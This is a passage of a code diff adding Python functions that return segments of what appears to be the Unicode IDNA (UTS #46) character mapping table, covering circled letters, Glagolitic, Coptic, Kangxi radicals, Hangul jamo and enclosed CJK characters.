'3', '(f)'), + (0x24A2, '3', '(g)'), + (0x24A3, '3', '(h)'), + (0x24A4, '3', '(i)'), + (0x24A5, '3', '(j)'), + (0x24A6, '3', '(k)'), + (0x24A7, '3', '(l)'), + (0x24A8, '3', '(m)'), + (0x24A9, '3', '(n)'), + (0x24AA, '3', '(o)'), + (0x24AB, '3', '(p)'), + (0x24AC, '3', '(q)'), + (0x24AD, '3', '(r)'), + (0x24AE, '3', '(s)'), + (0x24AF, '3', '(t)'), + (0x24B0, '3', '(u)'), + (0x24B1, '3', '(v)'), + (0x24B2, '3', '(w)'), + (0x24B3, '3', '(x)'), + (0x24B4, '3', '(y)'), + (0x24B5, '3', '(z)'), + (0x24B6, 'M', 'a'), + (0x24B7, 'M', 'b'), + (0x24B8, 'M', 'c'), + (0x24B9, 'M', 'd'), + (0x24BA, 'M', 'e'), + (0x24BB, 'M', 'f'), + (0x24BC, 'M', 'g'), + ] + +def _seg_24() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x24BD, 'M', 'h'), + (0x24BE, 'M', 'i'), + (0x24BF, 'M', 'j'), + (0x24C0, 'M', 'k'), + (0x24C1, 'M', 'l'), + (0x24C2, 'M', 'm'), + (0x24C3, 'M', 'n'), + (0x24C4, 'M', 'o'), + (0x24C5, 'M', 'p'), + (0x24C6, 'M', 'q'), + (0x24C7, 'M', 'r'), + (0x24C8, 'M', 's'), + (0x24C9, 'M', 't'), + (0x24CA, 'M', 'u'), + (0x24CB, 'M', 'v'), + (0x24CC, 'M', 'w'), + (0x24CD, 'M', 'x'), + (0x24CE, 'M', 'y'), + (0x24CF, 'M', 'z'), + (0x24D0, 'M', 'a'), + (0x24D1, 'M', 'b'), + (0x24D2, 'M', 'c'), + (0x24D3, 'M', 'd'), + (0x24D4, 'M', 'e'), + (0x24D5, 'M', 'f'), + (0x24D6, 'M', 'g'), + (0x24D7, 'M', 'h'), + (0x24D8, 'M', 'i'), + (0x24D9, 'M', 'j'), + (0x24DA, 'M', 'k'), + (0x24DB, 'M', 'l'), + (0x24DC, 'M', 'm'), + (0x24DD, 'M', 'n'), + (0x24DE, 'M', 'o'), + (0x24DF, 'M', 'p'), + (0x24E0, 'M', 'q'), + (0x24E1, 'M', 'r'), + (0x24E2, 'M', 's'), + (0x24E3, 'M', 't'), + (0x24E4, 'M', 'u'), + (0x24E5, 'M', 'v'), + (0x24E6, 'M', 'w'), + (0x24E7, 'M', 'x'), + (0x24E8, 'M', 'y'), + (0x24E9, 'M', 'z'), + (0x24EA, 'M', '0'), + (0x24EB, 'V'), + (0x2A0C, 'M', '∫∫∫∫'), + (0x2A0D, 'V'), + (0x2A74, '3', '::='), + (0x2A75, '3', '=='), + (0x2A76, '3', '==='), + (0x2A77, 'V'), + (0x2ADC, 'M', '⫝̸'), + (0x2ADD, 'V'), + (0x2B74, 'X'), + (0x2B76, 'V'), + (0x2B96, 'X'), + (0x2B97, 'V'), + (0x2C00, 'M', 'ⰰ'), + (0x2C01, 'M', 'ⰱ'), + (0x2C02, 'M', 'ⰲ'), + (0x2C03, 'M', 'ⰳ'), + (0x2C04, 'M', 'ⰴ'), + (0x2C05, 'M', 'ⰵ'), + (0x2C06, 'M', 'ⰶ'), + (0x2C07, 'M', 'ⰷ'), + (0x2C08, 'M', 'ⰸ'), + (0x2C09, 'M', 'ⰹ'), + (0x2C0A, 'M', 'ⰺ'), + (0x2C0B, 'M', 'ⰻ'), + (0x2C0C, 'M', 'ⰼ'), + (0x2C0D, 'M', 'ⰽ'), + (0x2C0E, 'M', 'ⰾ'), + (0x2C0F, 'M', 'ⰿ'), + (0x2C10, 'M', 'ⱀ'), + (0x2C11, 'M', 'ⱁ'), + (0x2C12, 'M', 'ⱂ'), + (0x2C13, 'M', 'ⱃ'), + (0x2C14, 'M', 'ⱄ'), + (0x2C15, 'M', 'ⱅ'), + (0x2C16, 'M', 'ⱆ'), + (0x2C17, 'M', 'ⱇ'), + (0x2C18, 'M', 'ⱈ'), + (0x2C19, 'M', 'ⱉ'), + (0x2C1A, 'M', 'ⱊ'), + (0x2C1B, 'M', 'ⱋ'), + (0x2C1C, 'M', 'ⱌ'), + (0x2C1D, 'M', 'ⱍ'), + (0x2C1E, 'M', 'ⱎ'), + (0x2C1F, 'M', 'ⱏ'), + (0x2C20, 'M', 'ⱐ'), + (0x2C21, 'M', 'ⱑ'), + (0x2C22, 'M', 'ⱒ'), + (0x2C23, 'M', 'ⱓ'), + (0x2C24, 'M', 'ⱔ'), + (0x2C25, 'M', 'ⱕ'), + (0x2C26, 'M', 'ⱖ'), + (0x2C27, 'M', 'ⱗ'), + (0x2C28, 'M', 'ⱘ'), + ] + +def _seg_25() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2C29, 'M', 'ⱙ'), + (0x2C2A, 'M', 'ⱚ'), + (0x2C2B, 'M', 'ⱛ'), + (0x2C2C, 'M', 'ⱜ'), + (0x2C2D, 'M', 'ⱝ'), + (0x2C2E, 'M', 'ⱞ'), + (0x2C2F, 'M', 'ⱟ'), + (0x2C30, 'V'), + (0x2C60, 'M', 'ⱡ'), + (0x2C61, 'V'), + (0x2C62, 'M', 'ɫ'), + (0x2C63, 'M', 'ᵽ'), + (0x2C64, 'M', 'ɽ'), + (0x2C65, 'V'), + (0x2C67, 'M', 'ⱨ'), + (0x2C68, 'V'), + (0x2C69, 'M', 'ⱪ'), + (0x2C6A, 'V'), + (0x2C6B, 'M', 'ⱬ'), + (0x2C6C, 'V'), + (0x2C6D, 'M', 'ɑ'), + (0x2C6E, 'M', 'ɱ'), + (0x2C6F, 'M', 'ɐ'), + (0x2C70, 'M', 'ɒ'), + (0x2C71, 'V'), + (0x2C72, 'M', 'ⱳ'), + (0x2C73, 'V'), + (0x2C75, 'M', 'ⱶ'), + (0x2C76, 'V'), + (0x2C7C, 'M', 'j'), + (0x2C7D, 'M', 'v'), + (0x2C7E, 'M', 'ȿ'), + (0x2C7F, 'M', 'ɀ'), + (0x2C80, 'M', 'ⲁ'), + (0x2C81, 'V'), + (0x2C82, 'M', 'ⲃ'), + (0x2C83, 'V'), + (0x2C84, 'M', 'ⲅ'), + (0x2C85, 'V'), + (0x2C86, 'M', 'ⲇ'), + (0x2C87, 'V'), + (0x2C88, 'M', 'ⲉ'), + (0x2C89, 'V'), + (0x2C8A, 'M', 'ⲋ'), + (0x2C8B, 'V'), + (0x2C8C, 'M', 'ⲍ'), + (0x2C8D, 'V'), + (0x2C8E, 'M', 'ⲏ'), + (0x2C8F, 'V'), + (0x2C90, 'M', 'ⲑ'), + (0x2C91, 'V'), + (0x2C92, 'M', 'ⲓ'), + (0x2C93, 'V'), + (0x2C94, 'M', 'ⲕ'), + (0x2C95, 'V'), + (0x2C96, 'M', 'ⲗ'), + (0x2C97, 'V'), + (0x2C98, 'M', 'ⲙ'), + (0x2C99, 'V'), + (0x2C9A, 'M', 'ⲛ'), + (0x2C9B, 'V'), + (0x2C9C, 'M', 'ⲝ'), + (0x2C9D, 'V'), + (0x2C9E, 'M', 'ⲟ'), + (0x2C9F, 'V'), + (0x2CA0, 'M', 'ⲡ'), + (0x2CA1, 'V'), + (0x2CA2, 'M', 'ⲣ'), + (0x2CA3, 'V'), + (0x2CA4, 'M', 'ⲥ'), + (0x2CA5, 'V'), + (0x2CA6, 'M', 'ⲧ'), + (0x2CA7, 'V'), + (0x2CA8, 'M', 'ⲩ'), + (0x2CA9, 'V'), + (0x2CAA, 'M', 'ⲫ'), + (0x2CAB, 'V'), + (0x2CAC, 'M', 'ⲭ'), + (0x2CAD, 'V'), + (0x2CAE, 'M', 'ⲯ'), + (0x2CAF, 'V'), + (0x2CB0, 'M', 'ⲱ'), + (0x2CB1, 'V'), + (0x2CB2, 'M', 'ⲳ'), + (0x2CB3, 'V'), + (0x2CB4, 'M', 'ⲵ'), + (0x2CB5, 'V'), + (0x2CB6, 'M', 'ⲷ'), + (0x2CB7, 'V'), + (0x2CB8, 'M', 'ⲹ'), + (0x2CB9, 'V'), + (0x2CBA, 'M', 'ⲻ'), + (0x2CBB, 'V'), + (0x2CBC, 'M', 'ⲽ'), + (0x2CBD, 'V'), + (0x2CBE, 'M', 'ⲿ'), + (0x2CBF, 'V'), + (0x2CC0, 'M', 'ⳁ'), + (0x2CC1, 'V'), + (0x2CC2, 'M', 'ⳃ'), + ] + +def _seg_26() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2CC3, 'V'), + (0x2CC4, 'M', 'ⳅ'), + (0x2CC5, 'V'), + (0x2CC6, 'M', 'ⳇ'), + (0x2CC7, 'V'), + (0x2CC8, 'M', 'ⳉ'), + (0x2CC9, 'V'), + (0x2CCA, 'M', 'ⳋ'), + (0x2CCB, 'V'), + (0x2CCC, 'M', 'ⳍ'), + (0x2CCD, 'V'), + (0x2CCE, 'M', 'ⳏ'), + (0x2CCF, 'V'), + (0x2CD0, 'M', 'ⳑ'), + (0x2CD1, 'V'), + (0x2CD2, 'M', 'ⳓ'), + (0x2CD3, 'V'), + (0x2CD4, 'M', 'ⳕ'), + (0x2CD5, 'V'), + (0x2CD6, 'M', 'ⳗ'), + (0x2CD7, 'V'), + (0x2CD8, 'M', 'ⳙ'), + (0x2CD9, 'V'), + (0x2CDA, 'M', 'ⳛ'), + (0x2CDB, 'V'), + (0x2CDC, 'M', 'ⳝ'), + (0x2CDD, 'V'), + (0x2CDE, 'M', 'ⳟ'), + (0x2CDF, 'V'), + (0x2CE0, 'M', 'ⳡ'), + (0x2CE1, 'V'), + (0x2CE2, 'M', 'ⳣ'), + (0x2CE3, 'V'), + (0x2CEB, 'M', 'ⳬ'), + (0x2CEC, 'V'), + (0x2CED, 'M', 'ⳮ'), + (0x2CEE, 'V'), + (0x2CF2, 'M', 'ⳳ'), + (0x2CF3, 'V'), + (0x2CF4, 'X'), + (0x2CF9, 'V'), + (0x2D26, 'X'), + (0x2D27, 'V'), + (0x2D28, 'X'), + (0x2D2D, 'V'), + (0x2D2E, 'X'), + (0x2D30, 'V'), + (0x2D68, 'X'), + (0x2D6F, 'M', 'ⵡ'), + (0x2D70, 'V'), + (0x2D71, 'X'), + (0x2D7F, 'V'), + (0x2D97, 'X'), + (0x2DA0, 'V'), + (0x2DA7, 'X'), + (0x2DA8, 'V'), + (0x2DAF, 'X'), + (0x2DB0, 'V'), + (0x2DB7, 'X'), + (0x2DB8, 'V'), + (0x2DBF, 'X'), + (0x2DC0, 'V'), + (0x2DC7, 'X'), + (0x2DC8, 'V'), + (0x2DCF, 'X'), + (0x2DD0, 'V'), + (0x2DD7, 'X'), + (0x2DD8, 'V'), + (0x2DDF, 'X'), + (0x2DE0, 'V'), + (0x2E5E, 'X'), + (0x2E80, 'V'), + (0x2E9A, 'X'), + (0x2E9B, 'V'), + (0x2E9F, 'M', '母'), + (0x2EA0, 'V'), + (0x2EF3, 'M', '龟'), + (0x2EF4, 'X'), + (0x2F00, 'M', '一'), + (0x2F01, 'M', '丨'), + (0x2F02, 'M', '丶'), + (0x2F03, 'M', '丿'), + (0x2F04, 'M', '乙'), + (0x2F05, 'M', '亅'), + (0x2F06, 'M', '二'), + (0x2F07, 'M', '亠'), + (0x2F08, 'M', '人'), + (0x2F09, 'M', '儿'), + (0x2F0A, 'M', '入'), + (0x2F0B, 'M', '八'), + (0x2F0C, 'M', '冂'), + (0x2F0D, 'M', '冖'), + (0x2F0E, 'M', '冫'), + (0x2F0F, 'M', '几'), + (0x2F10, 'M', '凵'), + (0x2F11, 'M', '刀'), + (0x2F12, 'M', '力'), + (0x2F13, 'M', '勹'), + (0x2F14, 'M', '匕'), + (0x2F15, 'M', '匚'), + ] + +def _seg_27() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F16, 'M', '匸'), + (0x2F17, 'M', '十'), + (0x2F18, 'M', '卜'), + (0x2F19, 'M', '卩'), + (0x2F1A, 'M', '厂'), + (0x2F1B, 'M', '厶'), + (0x2F1C, 'M', '又'), + (0x2F1D, 'M', '口'), + (0x2F1E, 'M', '囗'), + (0x2F1F, 'M', '土'), + (0x2F20, 'M', '士'), + (0x2F21, 'M', '夂'), + (0x2F22, 'M', '夊'), + (0x2F23, 'M', '夕'), + (0x2F24, 'M', '大'), + (0x2F25, 'M', '女'), + (0x2F26, 'M', '子'), + (0x2F27, 'M', '宀'), + (0x2F28, 'M', '寸'), + (0x2F29, 'M', '小'), + (0x2F2A, 'M', '尢'), + (0x2F2B, 'M', '尸'), + (0x2F2C, 'M', '屮'), + (0x2F2D, 'M', '山'), + (0x2F2E, 'M', '巛'), + (0x2F2F, 'M', '工'), + (0x2F30, 'M', '己'), + (0x2F31, 'M', '巾'), + (0x2F32, 'M', '干'), + (0x2F33, 'M', '幺'), + (0x2F34, 'M', '广'), + (0x2F35, 'M', '廴'), + (0x2F36, 'M', '廾'), + (0x2F37, 'M', '弋'), + (0x2F38, 'M', '弓'), + (0x2F39, 'M', '彐'), + (0x2F3A, 'M', '彡'), + (0x2F3B, 'M', '彳'), + (0x2F3C, 'M', '心'), + (0x2F3D, 'M', '戈'), + (0x2F3E, 'M', '戶'), + (0x2F3F, 'M', '手'), + (0x2F40, 'M', '支'), + (0x2F41, 'M', '攴'), + (0x2F42, 'M', '文'), + (0x2F43, 'M', '斗'), + (0x2F44, 'M', '斤'), + (0x2F45, 'M', '方'), + (0x2F46, 'M', '无'), + (0x2F47, 'M', '日'), + (0x2F48, 'M', '曰'), + (0x2F49, 'M', '月'), + (0x2F4A, 'M', '木'), + (0x2F4B, 'M', '欠'), + (0x2F4C, 'M', '止'), + (0x2F4D, 'M', '歹'), + (0x2F4E, 'M', '殳'), + (0x2F4F, 'M', '毋'), + (0x2F50, 'M', '比'), + (0x2F51, 'M', '毛'), + (0x2F52, 'M', '氏'), + (0x2F53, 'M', '气'), + (0x2F54, 'M', '水'), + (0x2F55, 'M', '火'), + (0x2F56, 'M', '爪'), + (0x2F57, 'M', '父'), + (0x2F58, 'M', '爻'), + (0x2F59, 'M', '爿'), + (0x2F5A, 'M', '片'), + (0x2F5B, 'M', '牙'), + (0x2F5C, 'M', '牛'), + (0x2F5D, 'M', '犬'), + (0x2F5E, 'M', '玄'), + (0x2F5F, 'M', '玉'), + (0x2F60, 'M', '瓜'), + (0x2F61, 'M', '瓦'), + (0x2F62, 'M', '甘'), + (0x2F63, 'M', '生'), + (0x2F64, 'M', '用'), + (0x2F65, 'M', '田'), + (0x2F66, 'M', '疋'), + (0x2F67, 'M', '疒'), + (0x2F68, 'M', '癶'), + (0x2F69, 'M', '白'), + (0x2F6A, 'M', '皮'), + (0x2F6B, 'M', '皿'), + (0x2F6C, 'M', '目'), + (0x2F6D, 'M', '矛'), + (0x2F6E, 'M', '矢'), + (0x2F6F, 'M', '石'), + (0x2F70, 'M', '示'), + (0x2F71, 'M', '禸'), + (0x2F72, 'M', '禾'), + (0x2F73, 'M', '穴'), + (0x2F74, 'M', '立'), + (0x2F75, 'M', '竹'), + (0x2F76, 'M', '米'), + (0x2F77, 'M', '糸'), + (0x2F78, 'M', '缶'), + (0x2F79, 'M', '网'), + ] + +def _seg_28() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F7A, 'M', '羊'), + (0x2F7B, 'M', '羽'), + (0x2F7C, 'M', '老'), + (0x2F7D, 'M', '而'), + (0x2F7E, 'M', '耒'), + (0x2F7F, 'M', '耳'), + (0x2F80, 'M', '聿'), + (0x2F81, 'M', '肉'), + (0x2F82, 'M', '臣'), + (0x2F83, 'M', '自'), + (0x2F84, 'M', '至'), + (0x2F85, 'M', '臼'), + (0x2F86, 'M', '舌'), + (0x2F87, 'M', '舛'), + (0x2F88, 'M', '舟'), + (0x2F89, 'M', '艮'), + (0x2F8A, 'M', '色'), + (0x2F8B, 'M', '艸'), + (0x2F8C, 'M', '虍'), + (0x2F8D, 'M', '虫'), + (0x2F8E, 'M', '血'), + (0x2F8F, 'M', '行'), + (0x2F90, 'M', '衣'), + (0x2F91, 'M', '襾'), + (0x2F92, 'M', '見'), + (0x2F93, 'M', '角'), + (0x2F94, 'M', '言'), + (0x2F95, 'M', '谷'), + (0x2F96, 'M', '豆'), + (0x2F97, 'M', '豕'), + (0x2F98, 'M', '豸'), + (0x2F99, 'M', '貝'), + (0x2F9A, 'M', '赤'), + (0x2F9B, 'M', '走'), + (0x2F9C, 'M', '足'), + (0x2F9D, 'M', '身'), + (0x2F9E, 'M', '車'), + (0x2F9F, 'M', '辛'), + (0x2FA0, 'M', '辰'), + (0x2FA1, 'M', '辵'), + (0x2FA2, 'M', '邑'), + (0x2FA3, 'M', '酉'), + (0x2FA4, 'M', '釆'), + (0x2FA5, 'M', '里'), + (0x2FA6, 'M', '金'), + (0x2FA7, 'M', '長'), + (0x2FA8, 'M', '門'), + (0x2FA9, 'M', '阜'), + (0x2FAA, 'M', '隶'), + (0x2FAB, 'M', '隹'), + (0x2FAC, 'M', '雨'), + (0x2FAD, 'M', '靑'), + (0x2FAE, 'M', '非'), + (0x2FAF, 'M', '面'), + (0x2FB0, 'M', '革'), + (0x2FB1, 'M', '韋'), + (0x2FB2, 'M', '韭'), + (0x2FB3, 'M', '音'), + (0x2FB4, 'M', '頁'), + (0x2FB5, 'M', '風'), + (0x2FB6, 'M', '飛'), + (0x2FB7, 'M', '食'), + (0x2FB8, 'M', '首'), + (0x2FB9, 'M', '香'), + (0x2FBA, 'M', '馬'), + (0x2FBB, 'M', '骨'), + (0x2FBC, 'M', '高'), + (0x2FBD, 'M', '髟'), + (0x2FBE, 'M', '鬥'), + (0x2FBF, 'M', '鬯'), + (0x2FC0, 'M', '鬲'), + (0x2FC1, 'M', '鬼'), + (0x2FC2, 'M', '魚'), + (0x2FC3, 'M', '鳥'), + (0x2FC4, 'M', '鹵'), + (0x2FC5, 'M', '鹿'), + (0x2FC6, 'M', '麥'), + (0x2FC7, 'M', '麻'), + (0x2FC8, 'M', '黃'), + (0x2FC9, 'M', '黍'), + (0x2FCA, 'M', '黑'), + (0x2FCB, 'M', '黹'), + (0x2FCC, 'M', '黽'), + (0x2FCD, 'M', '鼎'), + (0x2FCE, 'M', '鼓'), + (0x2FCF, 'M', '鼠'), + (0x2FD0, 'M', '鼻'), + (0x2FD1, 'M', '齊'), + (0x2FD2, 'M', '齒'), + (0x2FD3, 'M', '龍'), + (0x2FD4, 'M', '龜'), + (0x2FD5, 'M', '龠'), + (0x2FD6, 'X'), + (0x3000, '3', ' '), + (0x3001, 'V'), + (0x3002, 'M', '.'), + (0x3003, 'V'), + (0x3036, 'M', '〒'), + (0x3037, 'V'), + (0x3038, 'M', '十'), + ] + +def _seg_29() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3039, 'M', '卄'), + (0x303A, 'M', '卅'), + (0x303B, 'V'), + (0x3040, 'X'), + (0x3041, 'V'), + (0x3097, 'X'), + (0x3099, 'V'), + (0x309B, '3', ' ゙'), + (0x309C, '3', ' ゚'), + (0x309D, 'V'), + (0x309F, 'M', 'より'), + (0x30A0, 'V'), + (0x30FF, 'M', 'コト'), + (0x3100, 'X'), + (0x3105, 'V'), + (0x3130, 'X'), + (0x3131, 'M', 'ᄀ'), + (0x3132, 'M', 'ᄁ'), + (0x3133, 'M', 'ᆪ'), + (0x3134, 'M', 'ᄂ'), + (0x3135, 'M', 'ᆬ'), + (0x3136, 'M', 'ᆭ'), + (0x3137, 'M', 'ᄃ'), + (0x3138, 'M', 'ᄄ'), + (0x3139, 'M', 'ᄅ'), + (0x313A, 'M', 'ᆰ'), + (0x313B, 'M', 'ᆱ'), + (0x313C, 'M', 'ᆲ'), + (0x313D, 'M', 'ᆳ'), + (0x313E, 'M', 'ᆴ'), + (0x313F, 'M', 'ᆵ'), + (0x3140, 'M', 'ᄚ'), + (0x3141, 'M', 'ᄆ'), + (0x3142, 'M', 'ᄇ'), + (0x3143, 'M', 'ᄈ'), + (0x3144, 'M', 'ᄡ'), + (0x3145, 'M', 'ᄉ'), + (0x3146, 'M', 'ᄊ'), + (0x3147, 'M', 'ᄋ'), + (0x3148, 'M', 'ᄌ'), + (0x3149, 'M', 'ᄍ'), + (0x314A, 'M', 'ᄎ'), + (0x314B, 'M', 'ᄏ'), + (0x314C, 'M', 'ᄐ'), + (0x314D, 'M', 'ᄑ'), + (0x314E, 'M', 'ᄒ'), + (0x314F, 'M', 'ᅡ'), + (0x3150, 'M', 'ᅢ'), + (0x3151, 'M', 'ᅣ'), + (0x3152, 'M', 'ᅤ'), + (0x3153, 'M', 'ᅥ'), + (0x3154, 'M', 'ᅦ'), + (0x3155, 'M', 'ᅧ'), + (0x3156, 'M', 'ᅨ'), + (0x3157, 'M', 'ᅩ'), + (0x3158, 'M', 'ᅪ'), + (0x3159, 'M', 'ᅫ'), + (0x315A, 'M', 'ᅬ'), + (0x315B, 'M', 'ᅭ'), + (0x315C, 'M', 'ᅮ'), + (0x315D, 'M', 'ᅯ'), + (0x315E, 'M', 'ᅰ'), + (0x315F, 'M', 'ᅱ'), + (0x3160, 'M', 'ᅲ'), + (0x3161, 'M', 'ᅳ'), + (0x3162, 'M', 'ᅴ'), + (0x3163, 'M', 'ᅵ'), + (0x3164, 'X'), + (0x3165, 'M', 'ᄔ'), + (0x3166, 'M', 'ᄕ'), + (0x3167, 'M', 'ᇇ'), + (0x3168, 'M', 'ᇈ'), + (0x3169, 'M', 'ᇌ'), + (0x316A, 'M', 'ᇎ'), + (0x316B, 'M', 'ᇓ'), + (0x316C, 'M', 'ᇗ'), + (0x316D, 'M', 'ᇙ'), + (0x316E, 'M', 'ᄜ'), + (0x316F, 'M', 'ᇝ'), + (0x3170, 'M', 'ᇟ'), + (0x3171, 'M', 'ᄝ'), + (0x3172, 'M', 'ᄞ'), + (0x3173, 'M', 'ᄠ'), + (0x3174, 'M', 'ᄢ'), + (0x3175, 'M', 'ᄣ'), + (0x3176, 'M', 'ᄧ'), + (0x3177, 'M', 'ᄩ'), + (0x3178, 'M', 'ᄫ'), + (0x3179, 'M', 'ᄬ'), + (0x317A, 'M', 'ᄭ'), + (0x317B, 'M', 'ᄮ'), + (0x317C, 'M', 'ᄯ'), + (0x317D, 'M', 'ᄲ'), + (0x317E, 'M', 'ᄶ'), + (0x317F, 'M', 'ᅀ'), + (0x3180, 'M', 'ᅇ'), + (0x3181, 'M', 'ᅌ'), + (0x3182, 'M', 'ᇱ'), + (0x3183, 'M', 'ᇲ'), + (0x3184, 'M', 'ᅗ'), + ] + +def _seg_30() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3185, 'M', 'ᅘ'), + (0x3186, 'M', 'ᅙ'), + (0x3187, 'M', 'ᆄ'), + (0x3188, 'M', 'ᆅ'), + (0x3189, 'M', 'ᆈ'), + (0x318A, 'M', 'ᆑ'), + (0x318B, 'M', 'ᆒ'), + (0x318C, 'M', 'ᆔ'), + (0x318D, 'M', 'ᆞ'), + (0x318E, 'M', 'ᆡ'), + (0x318F, 'X'), + (0x3190, 'V'), + (0x3192, 'M', '一'), + (0x3193, 'M', '二'), + (0x3194, 'M', '三'), + (0x3195, 'M', '四'), + (0x3196, 'M', '上'), + (0x3197, 'M', '中'), + (0x3198, 'M', '下'), + (0x3199, 'M', '甲'), + (0x319A, 'M', '乙'), + (0x319B, 'M', '丙'), + (0x319C, 'M', '丁'), + (0x319D, 'M', '天'), + (0x319E, 'M', '地'), + (0x319F, 'M', '人'), + (0x31A0, 'V'), + (0x31E4, 'X'), + (0x31F0, 'V'), + (0x3200, '3', '(ᄀ)'), + (0x3201, '3', '(ᄂ)'), + (0x3202, '3', '(ᄃ)'), + (0x3203, '3', '(ᄅ)'), + (0x3204, '3', '(ᄆ)'), + (0x3205, '3', '(ᄇ)'), + (0x3206, '3', '(ᄉ)'), + (0x3207, '3', '(ᄋ)'), + (0x3208, '3', '(ᄌ)'), + (0x3209, '3', '(ᄎ)'), + (0x320A, '3', '(ᄏ)'), + (0x320B, '3', '(ᄐ)'), + (0x320C, '3', '(ᄑ)'), + (0x320D, '3', '(ᄒ)'), + (0x320E, '3', '(가)'), + (0x320F, '3', '(나)'), + (0x3210, '3', '(다)'), + (0x3211, '3', '(라)'), + (0x3212, '3', '(마)'), + (0x3213, '3', '(바)'), + (0x3214, '3', '(사)'), + (0x3215, '3', '(아)'), + (0x3216, '3', '(자)'), + (0x3217, '3', '(차)'), + (0x3218, '3', '(카)'), + (0x3219, '3', '(타)'), + (0x321A, '3', '(파)'), + (0x321B, '3', '(하)'), + (0x321C, '3', '(주)'), + (0x321D, '3', '(오전)'), + (0x321E, '3', '(오후)'), + (0x321F, 'X'), + (0x3220, '3', '(一)'), + (0x3221, '3', '(二)'), + (0x3222, '3', '(三)'), + (0x3223, '3', '(四)'), + (0x3224, '3', '(五)'), + (0x3225, '3', '(六)'), + (0x3226, '3', '(七)'), + (0x3227, '3', '(八)'), + (0x3228, '3', '(九)'), + (0x3229, '3', '(十)'), + (0x322A, '3', '(月)'), + (0x322B, '3', '(火)'), + (0x322C, '3', '(水)'), + (0x322D, '3', '(木)'), + (0x322E, '3', '(金)'), + (0x322F, '3', '(土)'), + (0x3230, '3', '(日)'), + (0x3231, '3', '(株)'), + (0x3232, '3', '(有)'), + (0x3233, '3', '(社)'), + (0x3234, '3', '(名)'), + (0x3235, '3', '(特)'), + (0x3236, '3', '(財)'), + (0x3237, '3', '(祝)'), + (0x3238, '3', '(労)'), + (0x3239, '3', '(代)'), + (0x323A, '3', '(呼)'), + (0x323B, '3', '(学)'), + (0x323C, '3', '(監)'), + (0x323D, '3', '(企)'), + (0x323E, '3', '(資)'), + (0x323F, '3', '(協)'), + (0x3240, '3', '(祭)'), + (0x3241, '3', '(休)'), + (0x3242, '3', '(自)'), + (0x3243, '3', '(至)'), + (0x3244, 'M', '問'), + (0x3245, 'M', '幼'), + (0x3246, 'M', '文'), + ] + +def _seg_31() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3247, 'M', '箏'), + (0x3248, 'V'), + (0x3250, 'M', 'pte'), + (0x3251, 'M', '21'), + (0x3252, 'M', '22'), + (0x3253, 'M', '23'), + (0x3254, 'M', '24'), + (0x3255, 'M', '25'), + (0x3256, 'M', '26'), + (0x3257, 'M', '27'), + (0x3258, 'M', '28'), + (0x3259, 'M', '29'), + (0x325A, 'M', '30'), + (0x325B, 'M', '31'), + (0x325C, 'M', '32'), + (0x325D, 'M', '33'), + (0x325E, 'M', '34'), + (0x325F, 'M', '35'), + (0x3260, 'M', 'ᄀ'), + (0x3261, 'M', 'ᄂ'), + (0x3262, 'M', 'ᄃ'), + (0x3263, 'M', 'ᄅ'), + (0x3264, 'M', 'ᄆ'), + (0x3265, 'M', 'ᄇ'), + (0x3266, 'M', 'ᄉ'), + (0x3267, 'M', 'ᄋ'), + (0x3268, 'M', 'ᄌ'), + (0x3269, 'M', 'ᄎ'), + (0x326A, 'M', 'ᄏ'), + (0x326B, 'M', 'ᄐ'), + (0x326C, 'M', 'ᄑ'), + (0x326D, 'M', 'ᄒ'), + (0x326E, 'M', '가'), + (0x326F, 'M', '나'), + (0x3270, 'M', '다'), + (0x3271, 'M', '라'), + (0x3272, 'M', '마'), + (0x3273, 'M', '바'), + (0x3274, 'M', '사'), + (0x3275, 'M', '아'), + (0x3276, 'M', '자'), + (0x3277, 'M', '차'), + (0x3278, 'M', '카'), + (0x3279, 'M', '타'), + (0x327A, 'M', '파'), + (0x327B, 'M', '하'), + (0x327C, 'M', '참고'), + (0x327D, 'M', '주의'), + (0x327E, 'M', '우'), + (0x327F, 'V'), + (0x3280, 'M', '一'), + (0x3281, 'M', '二'), + (0x3282, 'M', '三'), + (0x3283, 'M', '四'), + (0x3284, 'M', '五'), + (0x3285, 'M', '六'), + (0x3286, 'M', '七'), + (0x3287, 'M', '八'), + (0x3288, 'M', '九'), + (0x3289, 'M', '十'), + (0x328A, 'M', '月'), + (0x328B, 'M', '火'), + (0x328C, 'M', '水'), + (0x328D, 'M', '木'), + (0x328E, 'M', '金'), + (0x328F, 'M', '土'), + (0x3290, 'M', '日'), + (0x3291, 'M', '株'), + (0x3292, 'M', '有'), + (0x3293, 'M', '社'), + (0x3294, 'M', '名'), + (0x3295, 'M', '特'), + (0x3296, 'M', '財'), + (0x3297, 'M', '祝'), + (0x3298, 'M', '労'), + (0x3299, 'M', '秘'), + (0x329A, 'M', '男'), + (0x329B, 'M', '女'), + (0x329C, 'M', '適'), + (0x329D, 'M', '優'), + (0x329E, 'M', '印'), + (0x329F, 'M', '注'), + (0x32A0, 'M', '項'), + (0x32A1, 'M', '休'), + (0x32A2, 'M', '写'), + (0x32A3, 'M', '正'), + (0x32A4, 'M', '上'), + (0x32A5, 'M', '中'), + (0x32A6, 'M', '下'), + (0x32A7, 'M', '左'), + (0x32A8, 'M', '右'), + (0x32A9, 'M', '医'), + (0x32AA, 'M', '宗'), + (0x32AB, 'M', '学'), + (0x32AC, 'M', '監'), + (0x32AD, 'M', '企'), + (0x32AE, 'M', '資'), + (0x32AF, 'M', '協'), + (0x32B0, 'M', '夜'), + (0x32B1, 'M', '36'), + ] + +def _seg_32() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x32B2, 'M', '37'), + (0x32B3, 'M', '38'), + (0x32B4, 'M', '39'), + (0x32B5, 'M', '40'), + (0x32B6, 'M', '41'), + (0x32B7, 'M', '42'), + (0x32B8, 'M', '43'), + (0x32B9, 'M', '44'), + (0x32BA, 'M', '45'), + (0x32BB, 'M', '46'), + (0x32BC, 'M', '47'), + (0x32BD, 'M', '48'), + (0x32BE, 'M', '49'), + (0x32BF, 'M', '50'), + (0x32C0, 'M', '1月'), + (0x32C1, 'M', '2月'), 